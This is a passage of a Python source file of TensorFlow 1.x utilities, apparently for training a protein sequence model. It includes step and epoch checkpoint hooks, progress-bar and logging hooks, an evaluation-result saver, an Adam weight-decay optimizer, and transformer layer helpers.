step\n )\n\n should_stop = False\n for l in self._listeners:\n if l.after_save(session, step):\n tf.logging.info(\n \"A CheckpointSaverListener requested that training be stopped. \"\n \"listener: {}\".format(l)\n )\n should_stop = True\n return should_stop\n\n def _get_saver(self):\n return self._saver\n\n\nclass EpochCheckpointSaverHook(tf.train.CheckpointSaverHook):\n \"\"\"This checkpoint saver hook saves two types of checkpoints:\n\n 1. 
step:\n * Saves on save_secs or save_steps\n * Does not save on begin or end\n * Saves input pipeline state to continue training the remaining examples in the current epoch\n * Separately configurable garbage collection criteria from epoch\n * Defaults: max_to_keep=10, keep_checkpoint_every_n_hours=6\n * The default list of CheckpointSaverListener does not run on step checkpoint saves,\n you may configure a separate list of CheckpointSaverListeners by setting the step_listeners init arg\n * filename = step\n * latest_filename = step.latest\n\n 2. epoch:\n * Does not save on save_secs or save_steps\n * Saves on epoch end\n * Does not save input pipeline\n * Separately configurable garbage collection criteria from step\n * Does not garbage collect by default\n * Defaults: max_to_keep=9999, keep_checkpoint_every_n_hours=999999\n * set epoch_saver to a custom tf.train.Saver to change defaults\n * The default list of CheckpointSaverListener only runs on epoch checkpoint saves,\n this includes the default _NewCheckpointListenerForEvaluate added by tf.estimator.train_and_evaluate\n which runs the eval loop after every new checkpoint\n * filename = epoch\n * latest_filename = epoch.latest\n\n Usage:\n * Added to the list of EstimatorSpec.training_chief_hooks in your model_fn.\n * This prevents the default CheckpointSaverHook from being added\n * The end of an \"epoch\" is defined as the input_fn raising the OutOfRangeError,\n don't repeat the dataset or set the repeat_count to 1 if you want the \"expected\" behavior of\n one \"epoch\" being one iteration over all of the training data.\n * estimator.train or tf.estimator.train_and_evaluate will exit after the OutOfRangeError,\n wrap it with a for loop to train a limited number of epochs or a while True loop to train forever.\n\n Fixes more than one graph event per run warning in Tensorboard\n \"\"\"\n def __init__(\n self,\n checkpoint_dir,\n epoch_tensor=None,\n save_timer=None,\n save_secs=None,\n save_steps=None,\n saver=None,\n checkpoint_basename=None,\n scaffold=None,\n listeners=None,\n step_listeners=None,\n epoch_saver=None,\n epoch_basename='epoch',\n step_basename='step',\n epoch_latest_filename='epoch.latest',\n step_latest_filename='step.latest'\n ):\n \"\"\"Maintains compatibility with the `CheckpointSaverHook`.\n\n Args:\n checkpoint_dir: `str`, base directory for the checkpoint files.\n save_timer: `SecondOrStepTimer`, timer to save checkpoints.\n save_secs: `int`, save a step checkpoint every N secs.\n save_steps: `int`, save a step checkpoint every N steps.\n saver: `Saver` object, used for saving a final step checkpoint.\n checkpoint_basename: `str`, base name for the checkpoint files.\n scaffold: `Scaffold`, use to get saver object a final step checkpoint.\n listeners: List of `CheckpointSaverListener` subclass instances.\n Used for callbacks that run immediately before or after this hook saves\n a epoch checkpoint.\n step_listeners: List of `CheckpointSaverListener` subclass instances.\n Used for callbacks that run immediately before or after this hook saves\n a step checkpoint.\n epoch_saver: `Saver` object, used for saving a epoch checkpoint.\n step_basename: `str`, base name for the step checkpoint files.\n epoch_basename: `str`, base name for the epoch checkpoint files.\n\n Raises:\n ValueError: One of `save_steps` or `save_secs` should be set.\n ValueError: At most one of saver or scaffold should be set.\n \"\"\"\n tf.logging.info(\"Create EpochCheckpointSaverHook.\")\n if saver is not None and scaffold is not None:\n 
raise ValueError(\"You cannot provide both saver and scaffold.\")\n self._saver = saver\n self._checkpoint_dir = checkpoint_dir\n checkpoint_basename = checkpoint_basename or ''\n epoch_basename = ''.join(\n (checkpoint_basename, epoch_basename or 'step')\n )\n step_basename = ''.join((checkpoint_basename, step_basename or 'step'))\n self._epoch_save_path = os.path.join(checkpoint_dir, epoch_basename)\n self._step_save_path = os.path.join(checkpoint_dir, step_basename)\n self._epoch_latest_filename = epoch_latest_filename or 'epoch.latest'\n self._step_latest_filename = step_latest_filename or 'step.latest'\n self._scaffold = scaffold\n if save_timer:\n self._timer = save_timer\n else:\n self._timer = tf.train.SecondOrStepTimer(\n every_secs=save_secs, every_steps=save_steps\n )\n self._epoch_listeners = listeners or []\n # In _train_with_estimator_spec\n # saver_hooks[0]._listeners.extend(saving_listeners)\n self._step_listeners = step_listeners or []\n self._listeners = self._step_listeners\n self._epoch_saver = epoch_saver\n self._steps_per_run = 1\n self._epoch_tensor = epoch_tensor\n\n def _set_steps_per_run(self, steps_per_run):\n self._steps_per_run = steps_per_run\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n self._summary_writer = tf.summary.FileWriterCache.get(\n self._checkpoint_dir\n )\n self._global_step_tensor = training_util._get_or_create_global_step_read(\n ) # pylint: disable=protected-access\n if self._global_step_tensor is None:\n raise RuntimeError(\n \"Global step should be created to use EpochCheckpointSaverHook.\"\n )\n\n if self._epoch_saver is None:\n self._epoch_saver = tf.train.Saver(\n sharded=False,\n max_to_keep=9999,\n keep_checkpoint_every_n_hours=999999,\n defer_build=False,\n save_relative_paths=True\n )\n\n for l in self._epoch_listeners:\n l.begin()\n for l in self._step_listeners:\n l.begin()\n l._is_first_run = False\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. This\n has two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n global_step = session.run(self._global_step_tensor)\n # We do write graph and saver_def at the first call of before_run.\n # We cannot do this in begin, since we let other hooks to change graph and\n # add variables in begin. 
Graph is finalized after all begin calls.\n tf.train.write_graph(\n tf.get_default_graph().as_graph_def(add_shapes=True),\n self._checkpoint_dir, \"graph.pbtxt\"\n )\n saver_def = self._get_saver().saver_def if self._get_saver() else None\n graph = tf.get_default_graph()\n meta_graph_def = meta_graph.create_meta_graph_def(\n graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def\n )\n self._summary_writer.add_graph(graph, global_step=global_step)\n self._summary_writer.add_meta_graph(\n meta_graph_def, global_step=global_step\n )\n # The checkpoint saved here is the state at step \"global_step\".\n # do not save any checkpoints at start\n # self._save(session, global_step)\n self._timer.update_last_triggered_step(global_step)\n\n def before_run(self, run_context): # pylint: disable=unused-argument\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n return tf.train.SessionRunArgs(self._global_step_tensor)\n\n def after_run(self, run_context, run_values):\n \"\"\"Called after each call to run().\n\n The `run_values` argument contains results of requested ops/tensors by\n `before_run()`.\n\n The `run_context` argument is the same one send to `before_run` call.\n `run_context.request_stop()` can be called to stop the iteration.\n\n If `session.run()` raises any exceptions then `after_run()` is not called.\n\n Args:\n run_context: A `SessionRunContext` object.\n run_values: A SessionRunValues object.\n \"\"\"\n stale_global_step = run_values.results\n if self._timer.should_trigger_for_step(\n stale_global_step + self._steps_per_run\n ):\n # get the real value after train op.\n global_step = run_context.session.run(self._global_step_tensor)\n if self._timer.should_trigger_for_step(global_step):\n self._timer.update_last_triggered_step(global_step)\n if self._save_step(run_context.session, global_step):\n run_context.request_stop()\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. 
In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n # savables = tf.get_collection(tf.GraphKeys.SAVEABLE_OBJECTS)\n # savables_ref = tf.get_collection_ref(tf.GraphKeys.SAVEABLE_OBJECTS)\n # print('SAVEABLE_OBJECTS before', len(savables_ref), savables_ref)\n # # remove tensorflow.contrib.data.python.ops.iterator_ops._Saveable object\n # for v in savables:\n # if isinstance(v, _Saveable):\n # savables_ref.remove(v)\n # print('SAVEABLE_OBJECTS after', len(savables_ref), savables_ref)\n\n last_step = session.run(self._global_step_tensor)\n epoch = None\n if self._epoch_tensor is not None:\n epoch = session.run(self._epoch_tensor)\n\n if last_step != self._timer.last_triggered_step():\n self._save_step(session, last_step)\n\n self._save_epoch(session, last_step, epoch)\n\n for l in self._epoch_listeners:\n # _NewCheckpointListenerForEvaluate will run here at end\n l.end(session, last_step)\n\n for l in self._step_listeners:\n l.end(session, last_step)\n\n def _save_epoch(self, session, step, epoch):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n if epoch:\n save_path = '{}-{}'.format(self._epoch_save_path, epoch)\n else:\n save_path = self._epoch_save_path\n tf.logging.info(\n \"Saving\\033[1;31m epoch\\033[0m checkpoints for %d into %s.\", step,\n save_path\n )\n\n for l in self._epoch_listeners:\n l.before_save(session, step)\n\n self._get_epoch_saver().save(\n sess=session,\n save_path=save_path,\n global_step=step,\n latest_filename=self._epoch_latest_filename,\n meta_graph_suffix=\"meta\",\n write_meta_graph=True,\n write_state=True,\n strip_default_attrs=False\n )\n\n should_stop = False\n for l in self._epoch_listeners:\n # _NewCheckpointListenerForEvaluate will not run here\n # since _is_first_run == True, it will run at end\n if l.after_save(session, step):\n tf.logging.info(\n \"An Epoch CheckpointSaverListener requested that training be stopped. \"\n \"listener: {}\".format(l)\n )\n should_stop = True\n return should_stop\n\n def _save_step(self, session, step):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n tf.logging.info(\n \"Saving\\033[1;31m step\\033[0m checkpoints for %d into %s.\", step,\n self._step_save_path\n )\n\n for l in self._step_listeners:\n l.before_save(session, step)\n\n saver = self._get_step_saver()\n\n saver.save(\n sess=session,\n save_path=self._step_save_path,\n global_step=step,\n # latest_filename=self._step_latest_filename,\n latest_filename=None,\n meta_graph_suffix=\"meta\",\n write_meta_graph=True,\n write_state=True,\n strip_default_attrs=False\n )\n self._summary_writer.add_session_log(\n SessionLog(\n status=SessionLog.CHECKPOINT,\n checkpoint_path=self._step_save_path\n ), # pylint: disable=no-member\n step\n )\n\n should_stop = False\n for l in self._step_listeners:\n if l.after_save(session, step):\n tf.logging.info(\n \"A Step CheckpointSaverListener requested that training be stopped. 
\"\n \"listener: {}\".format(l)\n )\n should_stop = True\n return should_stop\n\n def _save(self, session, step):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n return self._save_step(session, step)\n\n def _get_epoch_saver(self):\n return self._epoch_saver\n\n def _get_step_saver(self):\n if self._saver is not None:\n return self._saver\n elif self._scaffold is not None:\n return self._scaffold.saver\n\n # Get saver from the SAVERS collection if present.\n collection_key = tf.GraphKeys.SAVERS\n savers = tf.get_collection(collection_key)\n if not savers:\n raise RuntimeError(\n \"No items in collection {}. Please add a saver to the collection \"\n \"or provide a saver or scaffold.\".format(collection_key)\n )\n elif len(savers) > 1:\n raise RuntimeError(\n \"More than one item in collection {}. \"\n \"Please indicate which one to use by passing it to the constructor.\"\n .format(collection_key)\n )\n\n self._saver = savers[0]\n return savers[0]\n\n def _get_saver(self):\n return self._get_step_saver()\n\n\norig_stdout = sys.stdout\n\n\nclass EpochProgressBarHook(tf.train.SessionRunHook):\n def __init__(\n self,\n total,\n initial_tensor,\n n_tensor,\n postfix_tensors=None,\n every_n_iter=None\n ):\n self._total = total\n self._initial_tensor = initial_tensor\n self._n_tensor = n_tensor\n self._postfix_tensors = postfix_tensors\n self._every_n_iter = every_n_iter\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n pass\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. This\n has two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n initial = session.run(self._initial_tensor)\n epoch = initial // self._total\n epoch_initial = initial % self._total\n # print('after_create_session', initial, epoch)\n # setup progressbar\n self.pbar = tqdm(\n total=self._total,\n unit='seq',\n desc='Epoch {}'.format(epoch),\n mininterval=0.1,\n maxinterval=10.0,\n miniters=None,\n file=orig_stdout,\n dynamic_ncols=True,\n smoothing=0,\n bar_format=None,\n initial=epoch_initial,\n postfix=None\n )\n\n def before_run(self, run_context): # pylint: disable=unused-argument\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. 
These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n return tf.train.SessionRunArgs(self._n_tensor)\n\n def after_run(self, run_context, run_values):\n \"\"\"Called after each call to run().\n\n The `run_values` argument contains results of requested ops/tensors by\n `before_run()`.\n\n The `run_context` argument is the same one send to `before_run` call.\n `run_context.request_stop()` can be called to stop the iteration.\n\n If `session.run()` raises any exceptions then `after_run()` is not called.\n\n Args:\n run_context: A `SessionRunContext` object.\n run_values: A SessionRunValues object.\n \"\"\"\n # print('run_values', run_values.results)\n # update progressbar\n self.pbar.update(run_values.results)\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n self.pbar.close()\n\n\nclass EvalProgressBarHook(tf.train.SessionRunHook):\n def __init__(\n self, total, n_tensor, postfix_tensors=None, every_n_iter=None\n ):\n self._total = total\n self._n_tensor = n_tensor\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n pass\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. 
This\n has two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n # print('after_create_session', initial, epoch)\n # setup progressbar\n self.pbar = tqdm(\n total=self._total,\n unit='seq',\n desc='Eval',\n mininterval=0.1,\n maxinterval=10.0,\n miniters=None,\n file=orig_stdout,\n dynamic_ncols=True,\n smoothing=0,\n bar_format=None,\n initial=0,\n postfix=None\n )\n\n def before_run(self, run_context): # pylint: disable=unused-argument\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n return tf.train.SessionRunArgs(self._n_tensor)\n\n def after_run(self, run_context, run_values):\n \"\"\"Called after each call to run().\n\n The `run_values` argument contains results of requested ops/tensors by\n `before_run()`.\n\n The `run_context` argument is the same one send to `before_run` call.\n `run_context.request_stop()` can be called to stop the iteration.\n\n If `session.run()` raises any exceptions then `after_run()` is not called.\n\n Args:\n run_context: A `SessionRunContext` object.\n run_values: A SessionRunValues object.\n \"\"\"\n # print('run_values', run_values.results)\n # update progressbar\n self.pbar.update(run_values.results)\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n self.pbar.close()\n\n\nclass ColoredLoggingTensorHook(tf.train.LoggingTensorHook):\n \"\"\"Prints the given tensors every N local steps, every N seconds, or at end.\n\n The tensors will be printed to the log, with `INFO` severity. 
If you are not\n    seeing the logs, you might want to add the following line after your imports:\n\n    ```python\n    tf.logging.set_verbosity(tf.logging.INFO)\n    ```\n\n    Note that if `at_end` is True, `tensors` should not include any tensor\n    whose evaluation produces a side effect such as consuming additional inputs.\n    \"\"\"\n    def _log_tensors(self, tensor_values):\n        original = np.get_printoptions()\n        np.set_printoptions(suppress=True)\n        elapsed_secs, _ = self._timer.update_last_triggered_step(\n            self._iter_count\n        )\n        if self._formatter:\n            if elapsed_secs is not None:\n                tf.logging.info(\n                    \"%s (%.3f sec)\", self._formatter(tensor_values),\n                    elapsed_secs\n                )\n            else:\n                tf.logging.info(self._formatter(tensor_values))\n        else:\n            stats = []\n            for tag in self._tag_order:\n                stats.append(\"%s = %s\" % (tag, tensor_values[tag]))\n            if elapsed_secs is not None:\n                tf.logging.info(\"%s (%.3f sec)\", \", \".join(stats), elapsed_secs)\n            else:\n                tf.logging.info(\"%s\", \", \".join(stats))\n        np.set_printoptions(**original)\n\n\nclass NumpyEncoder(json.JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, np.integer):\n            return int(obj)\n        elif isinstance(obj, np.floating):\n            return float(obj)\n        elif isinstance(obj, np.ndarray):\n            return obj.tolist()\n        else:\n            return super(NumpyEncoder, self).default(obj)\n\n\nclass SaveEvaluationResultHook(tf.train.SessionRunHook):\n    \"\"\"Saves evaluation results to disk for external use.\n    Saves one file per batch in JSON (or msgpack) format.\n    Removes padding for each sequence example and saves:\n    * protein sequence data\n    * correct class\n    * correct class prediction rank\n    * correct class prediction probability\n    * rank 1 prediction class\n    * rank 1 prediction probability\n    * rank N prediction class\n    * rank N prediction probability\n\n    protein shape=(batch_size, sequence_length), dtype=int32\n    labels shape=(batch_size, sequence_length), dtype=int32\n    top_probs shape=(batch_size, sequence_length, predict_top_k), dtype=float32\n    top_classes shape=(batch_size, sequence_length, predict_top_k), dtype=int32\n\n    logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n    ```python\n    import tensorflow as tf\n    tf.enable_eager_execution()\n    aa_list = ' FLIMVPAWGSTYQNCO*UHKRDEBZX-'\n    predict_top_k = 2\n    batch, length, depth = (2, 3, 5)\n    protein = tf.cast(tf.random_uniform([batch, length]) * len(aa_list), dtype=tf.int32)\n    labels = tf.cast(tf.random_uniform([batch, length]) * depth, dtype=tf.int32)\n    logits = tf.random_uniform([batch, length, depth])\n    all_probs = tf.nn.softmax(logits=logits, axis=-1, name='softmax_tensor')\n    top_probs, top_classes = tf.nn.top_k(all_probs, predict_top_k)\n    label_prob = tf.gather(all_probs, tf.expand_dims(labels, -1), batch_dims=-1)\n    # label_rank = tf.gather(tf.contrib.framework.argsort(all_probs, direction='DESCENDING'), tf.expand_dims(labels, -1), batch_dims=-1)\n    label_rank = tf.reshape(tf.where(tf.equal(tf.contrib.framework.argsort(all_probs, direction='DESCENDING'), tf.expand_dims(labels, -1)))[:,-1], tf.shape(labels))\n    label_rank = tf.reshape(tf.where(tf.equal(top_classes, tf.expand_dims(labels, -1)))[:,-1], tf.shape(labels))\n\n    ```\n    \"\"\"\n    def __init__(\n        self,\n        # protein, lengths, labels, label_prob, label_rank,\n        # top_classes, top_probs,\n        tensors,\n        model_dir,\n        output_dir=None,\n        output_prefix=None,\n        output_format='json'\n    ):\n        \"\"\"Initializes this hook.\n        Args:\n            protein: protein sequence data.\n            lengths: sequence lengths.\n            labels: correct class.\n            label_prob: correct class prediction probability.\n            label_rank: correct class prediction rank.\n            top_classes: rank N prediction class.\n            top_probs: rank N prediction probability.\n            output_dir: The output directory to save evaluation files. default: ${model_dir}/eval-${global_step}\n            output_prefix: The output filename which will be suffixed by the current\n                eval step. default: ${model_dir}@${global_step}-${eval_step}.${output_format}\n            output_format: default: json\n        \"\"\"\n        # self._protein = protein\n        # self._lengths = lengths\n        # self._labels = labels\n        # self._label_prob = label_prob\n        # self._label_rank = label_rank\n        # self._top_classes = top_classes\n        # self._top_probs = top_probs\n        self._tensors = tensors\n        self._model_dir = model_dir\n        self._output_dir = output_dir\n        self._output_prefix = output_prefix\n        self._output_format = output_format.lower()\n        self._first_run = True\n\n    def begin(self):\n        # if self._protein is None:\n        #     raise RuntimeError('The model did not define any protein.')\n        # if not self._labels:\n        #     raise RuntimeError('The model did not define any labels.')\n        # if not self._label_prob:\n        #     raise RuntimeError('The model did not define label_prob.')\n        # if not self._label_rank:\n        #     raise RuntimeError('The model did not define label_rank.')\n        # if not self._top_classes:\n        #     raise RuntimeError('The model did not define top_classes.')\n        # if not self._top_probs:\n        #     raise RuntimeError('The model did not define top_probs.')\n        self._tensors['global_step'] = tf.train.get_global_step(\n        )  # global step of checkpoint\n        if self._tensors['global_step'] is None:\n            raise RuntimeError(\n                'Global step should be created to use SaveEvaluationResultHook.'\n            )\n        self._tensors['eval_step'\n                      ] = tf.contrib.training.get_or_create_eval_step(\n                      )  # a counter for the evaluation step\n\n    def before_run(self, run_context):  # pylint: disable=unused-argument\n        return tf.train.SessionRunArgs(self._tensors)\n\n    def after_run(self, run_context, run_values):  # pylint: disable=unused-argument\n        results = run_values.results\n        global_step = results['global_step']\n        del results['global_step']\n        eval_step = results['eval_step']\n        del results['eval_step']\n        lengths = results['lengths'].tolist()\n        del results['lengths']\n        # generate default output_dir and output_prefix if needed\n        if not self._output_dir:\n            self._output_dir = str(\n                Path(self._model_dir) / 'eval-{}'.format(global_step)\n            )\n        if not self._output_prefix:\n            self._output_prefix = '{}@{}'.format(\n                Path(self._model_dir).name, global_step\n            )\n        output_path = Path(self._output_dir) / '{}-{}.{}'.format(\n            self._output_prefix, eval_step, self._output_format\n        )\n        if self._first_run:\n            self._first_run = False\n            # make sure directories exist\n            output_path.parent.mkdir(parents=True, exist_ok=True)  # pylint: disable=no-member\n        # remove padding\n        reslist = []\n        for i in range(len(lengths)):\n            res = {'length': lengths[i]}\n            for k in results.keys():\n                # print(i, k, lengths[i])\n                res[k] = results[k][i][:lengths[i]].tolist()\n            reslist.append(res)\n\n        if self._output_format == 'json':\n            with output_path.open(encoding='utf-8', mode='w') as f:  # pylint: disable=no-member\n                json.dump(\n                    reslist, f, indent=2, sort_keys=False, cls=NumpyEncoder\n                )\n            # e1 = json.loads(Path(r'4951306-1.json').read_text())\n        elif self._output_format == 'msgpack':\n            with output_path.open(mode='wb') as f:  # pylint: disable=no-member\n                msgpack.dump(reslist, f)\n            # e1 = msgpack.loads(Path(r'4951306-1.msgpack').read_bytes())\n        elif self._output_format == 'msgpack.gz':\n            with gzip.open(output_path, mode='wb') as f:  # pylint: disable=no-member\n                
msgpack.dump(reslist, f)\n            # e1 = msgpack.loads(Path(r'4951306-1.msgpack').read_bytes())\n\n    def end(self, session):\n        tf.logging.info('Evaluation results saved to %s', self._output_dir)\n        # if self._post_evaluation_fn is not None:\n        #     self._post_evaluation_fn(self._current_step, self._output_path)\n\n\nclass AdamWeightDecayOptimizer(tf.train.Optimizer):\n    \"\"\"A basic Adam optimizer that includes \"correct\" L2 weight decay.\"\"\"\n    def __init__(\n        self,\n        learning_rate,\n        weight_decay_rate=0.0,\n        beta_1=0.9,\n        beta_2=0.999,\n        epsilon=1e-6,\n        exclude_from_weight_decay=None,\n        name=\"AdamWeightDecayOptimizer\"\n    ):\n        \"\"\"Constructs an AdamWeightDecayOptimizer.\"\"\"\n        super(AdamWeightDecayOptimizer, self).__init__(False, name)\n\n        self.learning_rate = learning_rate\n        self.weight_decay_rate = weight_decay_rate\n        self.beta_1 = beta_1\n        self.beta_2 = beta_2\n        self.epsilon = epsilon\n        self.exclude_from_weight_decay = exclude_from_weight_decay\n\n    def apply_gradients(self, grads_and_vars, global_step=None, name=None):\n        \"\"\"See base class.\"\"\"\n        assignments = []\n        for (grad, param) in grads_and_vars:\n            if grad is None or param is None:\n                continue\n\n            param_name = self._get_variable_name(param.name)\n\n            m = tf.get_variable(\n                name=param_name + \"/adam_m\",\n                shape=param.shape.as_list(),\n                dtype=tf.float32,\n                trainable=False,\n                initializer=tf.zeros_initializer()\n            )\n            v = tf.get_variable(\n                name=param_name + \"/adam_v\",\n                shape=param.shape.as_list(),\n                dtype=tf.float32,\n                trainable=False,\n                initializer=tf.zeros_initializer()\n            )\n\n            # Standard Adam update.\n            next_m = (\n                tf.multiply(self.beta_1, m) +\n                tf.multiply(1.0 - self.beta_1, grad)\n            )\n            next_v = (\n                tf.multiply(self.beta_2, v) +\n                tf.multiply(1.0 - self.beta_2, tf.square(grad))\n            )\n\n            update = next_m / (tf.sqrt(next_v) + self.epsilon)\n\n            # Just adding the square of the weights to the loss function is *not*\n            # the correct way of using L2 regularization/weight decay with Adam,\n            # since that will interact with the m and v parameters in strange ways.\n            #\n            # Instead we want to decay the weights in a manner that doesn't interact\n            # with the m/v parameters. 
This is equivalent to adding the square\n # of the weights to the loss with plain (non-momentum) SGD.\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n\n update_with_lr = self.learning_rate * update\n\n next_param = param - update_with_lr\n\n assignments.extend(\n [param.assign(next_param),\n m.assign(next_m),\n v.assign(next_v)]\n )\n return tf.group(*assignments, name=name)\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n return False\n return True\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n m = re.match(\"^(.*):\\\\d+$\", param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n\n\n# Transformer Layers\ndef get_angles(pos, i, d_model):\n angle_rates = 1 / np.power(10000, (2 * (i // 2)) / np.float32(d_model))\n return pos * angle_rates\n\n\ndef positional_encoding(position, d_model):\n angle_rads = get_angles(\n np.arange(position)[:, np.newaxis],\n np.arange(d_model)[np.newaxis, :], d_model\n )\n # apply sin to even indices in the array; 2i\n angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n # apply cos to odd indices in the array; 2i+1\n angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n pos_encoding = angle_rads[np.newaxis, ...]\n return tf.cast(pos_encoding, dtype=tf.float32)\n\n\ndef scaled_dot_product_attention(q, k, v, mask):\n \"\"\"Calculate the attention weights.\n q, k, v must have matching leading dimensions.\n k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.\n The mask has different shapes depending on its type(padding or look ahead) \n but it must be broadcastable for addition.\n Args:\n q: query shape == (..., seq_len_q, depth)\n k: key shape == (..., seq_len_k, depth)\n v: value shape == (..., seq_len_v, depth_v)\n mask: Float tensor with shape broadcastable \n to (..., seq_len_q, seq_len_k). 
Defaults to None.\n Returns:\n output, attention_weights\n \"\"\"\n matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)\n # scale matmul_qk\n dk = tf.cast(tf.shape(k)[-1], tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n # add the mask to the scaled tensor.\n if mask is not None:\n scaled_attention_logits += (mask * -1e9)\n # softmax is normalized on the last axis (seq_len_k) so that the scores\n # add up to 1.\n attention_weights = tf.nn.softmax(\n scaled_attention_logits, axis=-1\n ) # (..., seq_len_q, seq_len_k)\n # seq_len_k == seq_len_v\n output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)\n return output, attention_weights\n\n\ndef gelu(x):\n \"\"\"Gaussian Error Linear Unit.\n This is a smoother version of the RELU.\n Original paper: https://arxiv.org/abs/1606.08415\n Args:\n x: float Tensor to perform activation.\n Returns:\n `x` with the GELU activation applied.\n \"\"\"\n cdf = 0.5 * (\n 1.0 + tf.tanh((np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3))))\n )\n return x * cdf\n\n\ndef point_wise_feed_forward_network(d_model, dff):\n return tf.keras.Sequential(\n [\n tf.keras.layers.Dense(\n dff,\n activation=gelu,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n ), # (batch_size, seq_len, dff)\n tf.keras.layers.Dense(\n d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n ) # 